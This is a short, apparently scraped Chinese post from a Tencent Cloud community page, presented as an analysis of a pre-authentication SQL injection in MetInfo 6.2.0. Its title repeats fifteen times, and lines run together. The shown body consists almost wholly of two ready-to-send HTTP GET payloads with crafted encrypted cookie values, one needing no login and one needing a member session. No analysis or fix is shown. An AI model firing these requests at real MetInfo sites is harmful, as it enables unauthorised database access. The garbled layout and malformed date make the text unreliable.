漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
payload
这里有两个,一个是不需要登陆就可注入,另一个是coolcat表哥所说的需要以会员登陆。以下请自行替换p参数。
1、不需要登陆
GET /admin/index.php?n=user&m=web&c=register&a=doemailvild HTTP/1.1
Cookie: p=00c7%2FDBwD23b41olxVCthTvDDTRBhldmrrdyA8S3t%2F3yAl4QZ0P%2FSfOS5zlB2、 需要登陆
GET /admin/index.php?n=user&m=web&c=profile&a=dosafety_emailadd HTTP/1.1
Cookie: p=497cD9UpkDtsvFzU9IKNlPvSyg1z%2bf09cmp8hqUeyJW9ekvPfJqx8cLKFSHr;<自行添加登陆后的cookie>本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-04-035,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
